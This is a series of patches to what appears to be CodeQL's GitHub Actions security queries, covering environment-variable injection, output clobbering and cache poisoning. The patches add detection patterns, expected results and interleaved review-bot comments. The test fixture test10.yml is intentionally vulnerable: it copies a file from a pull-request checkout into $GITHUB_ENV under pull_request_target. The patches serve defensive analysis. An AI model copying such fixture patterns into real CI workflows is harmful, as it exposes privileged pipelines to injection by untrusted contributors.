value.indexOf(var_name) > 0 + // e.g. 
+ // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4fe3268c00a..af8f7af089d 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
@@ -12,40 +13,53 @@ abstract class OutputClobberingSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.vars >> $GITHUB_OUTPUT * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT * echo "sha=$(> $GITHUB_OUTPUT */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and - not key2 = key - ) and ( - outputsPartialFileContent(value) - or // e.g. 
- // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.vars >> $GITHUB_OUTPUT + fileToGitHubOutput(run, _) + or + exists(string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml new file mode 100644 index 00000000000..f43a12cb42a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml 
@@ -0,0 +1,28 @@
+name: Build and Dockerize
+
+on:
+ pull_request_target:
+
+jobs:
+ build:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - name: Decide Which 'ref' To Checkout
+ id: decide-ref
+ run: |
+ if [[ "${{github.event_name}}" == "pull_request_target" ]]; then
+ echo "ref=refs/pull/${{ github.event.pull_request.number }}/merge" >> $GITHUB_OUTPUT
+ else
+ echo "ref=${{github.ref}}" >> $GITHUB_OUTPUT
+ fi
+
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{steps.decide-ref.outputs.ref}}
+ path: "foo"
+
+ - name: Read Java Config
+ run: cat foo/.github/java-config.env >> $GITHUB_ENV
+
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
index 7d92032f00b..359275aef43 100644
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected
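Review bot: This fixture exercises only the `cat <file> >> $GITHUB_ENV` form after a checkout of the pull-request merge ref, while the same commit also adds the `>` and `| tee -a` alternatives to the pattern and new sink branches for `$GITHUB_PATH` and `$GITHUB_OUTPUT`, for which the commit's diffstat lists no fixture. A further step such as `run: cat foo/.github/java-config.env | tee -a $GITHUB_ENV` would cover the other alternation. A step that copies a file from outside `foo/` would pin down whether that case is meant to alert, since the query currently ignores the path.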
@@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -80,3 +83,4 @@ subpaths | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be 
controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 2cd36953802..eaa9fed4c61 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -19,6 +19,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -58,5 +59,7 @@ nodes | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | subpaths #select From 0990774302bc2556973584bb4c4d41043f0d7b78 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 18:53:53 +0200 Subject: [PATCH 0449/1267] feat(poisonable_steps): Add python -m pip install --- ql/lib/ext/config/poisonable_steps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e2742fd60a7..f79ca795cd0 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml 
@@ -44,6 +44,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] + - ["python\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] From 397eb2a762ae15ff89237c7b8db0f8443ef9fdb1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:20 +0200 Subject: [PATCH 0450/1267] Add getPath() to PRHeadCheckout and CacheWriting classes Add getPath() methods to get the path where a checkout step writes the code and where a Cache write reads the files from. --- .../actions/security/CachePoisoningQuery.qll | 34 ++++++++++++++++++- .../security/UntrustedCheckoutQuery.qll | 30 +++++++++++++++- 2 files changed, 62 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 29c0ed4feed..8c1a9ee0fd7 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -44,14 +44,28 @@ predicate runsOnDefaultBranch(Event e) { ) } -abstract class CacheWritingStep extends Step { } +abstract class CacheWritingStep extends Step { + abstract string getPath(); +} class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path").splitAt("\n") + else result = "?" + } } class SetupJavaUsesStep extends CacheWritingStep, UsesStep { 
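Review bot: Both added patterns require `-r` or `--requirement` directly after `install` and whitespace directly after `python`, so `python -m pip install --upgrade -r requirements.txt` and `python3 -m pip install -r requirements.txt` are not recognised as poisonable steps. A single entry that allows a version suffix and intervening options would cover these variants: `- ["python[0-9.]*\\s+-m\\s+pip\\s+install\\s+(\\S+\\s+)*(-r|--requirement)"]`. How the list is matched against a step (anchored or as a substring) is decided outside this hunk, so the suggested pattern should be checked against that code.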
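Review bot: `CacheWritingStep.getPath()` is added without QLDoc, and its contract is not obvious from the overrides: it yields one result per line of the `path` input and the literal `"?"` when the path is not known. A comment on the abstract member, for example `/** Gets a path cached by this step, one result per line of the input, or "?" if it cannot be determined. */`, would tell callers that `"?"` must not be compared as a real path. The bodies in `CacheActionUsesStep` and `CacheActionSaveUsesStep` are identical, and the `this.(UsesStep)` cast is redundant in classes that already extend `UsesStep`. The same `"?"` placeholder is repeated in the `Setup*UsesStep` hunks that follow in this file.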
@@ -62,6 +76,9 @@ class SetupJavaUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupGoUsesStep extends CacheWritingStep, UsesStep { @@ -73,6 +90,9 @@ class SetupGoUsesStep extends CacheWritingStep, UsesStep { this.getArgument("cache") = "true" ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupNodeUsesStep extends CacheWritingStep, UsesStep { @@ -83,6 +103,9 @@ class SetupNodeUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupPythonUsesStep extends CacheWritingStep, UsesStep { @@ -93,6 +116,9 @@ class SetupPythonUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { @@ -103,6 +129,9 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { exists(this.getArgument("cache-dependency-path")) ) } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -110,4 +139,7 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and this.getArgument("bundler-cache") = "true" } + + // TODO: Try to get the actual path being cached + override string getPath() { result = "?" } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fba33bb8bc8..7cfda4da49c 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,6 +1,12 @@ import actions import codeql.actions.DataFlow +string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -68,7 +74,9 @@ predicate containsHeadRef(string s) { } /** Checkout of a Pull Request HEAD */ -abstract class PRHeadCheckoutStep extends Step { } +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} /** Checkout of a Pull Request HEAD ref */ abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } @@ -138,6 +146,12 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ @@ -194,6 +208,12 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ) ) } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "?" + } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -216,6 +236,8 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -235,6 +257,8 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ 
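Review bot: `getStepCWD()` takes no argument, so it cannot later be refined per step without touching every override added in the `GitMutableRefCheckout`, `GitSHACheckout`, `GhMutableRefCheckout` and `GhSHACheckout` hunks. Declaring it with the step as a parameter now, `string getStepCWD(Run run)`, while still returning `"?"`, would keep those overrides stable. The TODO comment also has a typo: `Read if from` should read `Read it from`.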
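Review bot: In `ActionsMutableRefCheckout.getPath()`, and in the identical override in `ActionsSHACheckout`, a missing `path` input returns `"?"`, the same placeholder used for an undeterminable location, although `actions/checkout` without `path` places the repository at the workspace root. Returning a distinct value for that default, for example `else result = "$GITHUB_WORKSPACE"`, would let a later path comparison treat the common checkout without `path` as a known directory instead of an unknown one. Both class bodies start outside their hunks.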
@@ -256,6 +280,8 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -274,4 +300,6 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) ) } + + override string getPath() { result = getStepCWD() } } From c5314aeb6c1e7497733f539c783ce5d7ec083bc9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:44:27 +0200 Subject: [PATCH 0451/1267] Add new tests --- .../CWE-349/.github/workflows/test22.yml | 35 +++++++++++++++++++ .../CWE-349/.github/workflows/test23.yml | 35 +++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml new file mode 100644 index 00000000000..f8e1dabf565 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore 
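Review bot: `test22.yml` and `test23.yml` differ only in the cache `path`: `~/.cache/pip` here, and `./results/pip` in the other file, which lies under the `results/` directory written by the download-artifact step. Neither file says which result it is meant to produce. A comment stating the expectation, for example `# cache path is outside the artifact download directory`, would make the intent reviewable without reading the .expected file. Appending it at the end of each fixture keeps the line numbers recorded in the .expected file unchanged.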
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml
new file mode 100644
index 00000000000..3f35068eb7d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml
@@ -0,0 +1,35 @@
+name: Test
+
+on:
+ issue_comment:
+
+permissions:
+ actions: write
+
+jobs:
+ generate-results:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ with:
+ python-version: "3.10"
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ./results/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+ - name: Download artifact
+ uses: actions/download-artifact@v4
+ with:
+ name: results
+ path: results/
+ - name: Upload results
+ uses: actions/upload-artifact@v4
+ with:
+ name: results
+ path: results/
+ if-no-files-found: ignore
From 34b48d559b17536e9274f0bcf9e462ab5a8aeb57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Aug 2024 23:45:51 +0200 Subject: [PATCH 0452/1267] Add expected tests results
---
.../Security/CWE-349/CachePoisoning.expected | 52 +++++++++++-------- 1 file changed, 30 insertions(+), 22 deletions(-)
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index 994beb3b74f..2ad477a2a8b 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -64,26 +64,34 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | +| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | +| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | +| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | +| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | +| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | +| .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | #select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | 
